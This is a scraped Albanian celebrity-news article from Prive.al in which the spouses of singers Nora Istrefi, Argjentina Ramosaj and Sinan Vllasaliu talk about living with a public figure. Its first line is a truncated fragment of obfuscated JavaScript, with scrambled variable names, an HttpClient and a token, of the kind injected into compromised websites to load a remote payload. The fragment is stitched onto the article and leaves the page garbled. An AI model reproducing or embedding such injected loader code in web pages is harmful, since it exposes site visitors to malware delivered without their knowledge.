;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Si është të jetosh me një fytyrë publike?! (Video)

By

Benificionet që sjell fakti i të qenurit i famshëm janë të shumta.

Njerëz që të duan e të përkrahin, mbrëmje muzikore e turnetë gjithandej nëpër botë janë disa nga piketat që masa e gjerë i ka lakmi.

Por paralelisht, profesioni si i tillë natyrisht që ka edhe anën tjetër të medaljes. Privatësia shumëzohet me zero dhe në raste të rëndësishme privohesh nga të qenurit pranë familjes.

Se si ndikon ky aspekt në jetën bashkëshortore kanë treguar partnerët e Nora Istrefit, Argjentina Ramosajt dhe Sinan Vllasaliut.

Bashkëshortja e Sinanit Teuta, tregoi për Prive se si janë njoftuar në moshë të re për ta kurorëzuar dashurinë e tyre më vonë me martesë.

Sinqeriteti dhe dashuria që i falte ishin dy prej elementeve me të cilat këngëtari kishte arritur të bënte për vete zonjën Teutë. Më pas, ajo për Prive veçoi edhe vendet ku kanë kaluar më së miri gjatë pushimeve në çift.

Nëntë vitet e fundit së bashku i kanë kaluar edhe një prej çifteve më të dashura të estradës, Nora Istrefi dhe Robert Berisha. Ky i fundit tregoi një të metë të Norës të cilën do të donte që ajo ta përmirësonte.

Vonesa, sikurse edhe për shumë femra tjera është ajo që e karakterizon këngëtaren dhe siç u shpreh Roberti, kjo veti tashmë dihet edhe nga familja dhe shoqëria.

Më tej, Roberti shtoi se si prind, ai pa përtesë ka kryer të gjitha punët përfshirë ndërrimin e pelenave për Renée-në.

Një tjetër lidhje që funksion tash e dy vite për mrekulli e që është forcuar edhe më shunë me lindjen e djalit Noah, është ajo e Argjentina Ramosajt e Dugagjin Fetahut.

Dugagjini rrëfeu për Prive se në fillimet e lidhjes i kanë penguar fjalët mirëpo tash është mësuar me faktin që gruaja e tij është fytyrë publike dhe kjo nuk i pengon aspak. /Prive.al/

Artikuj të ngjashëm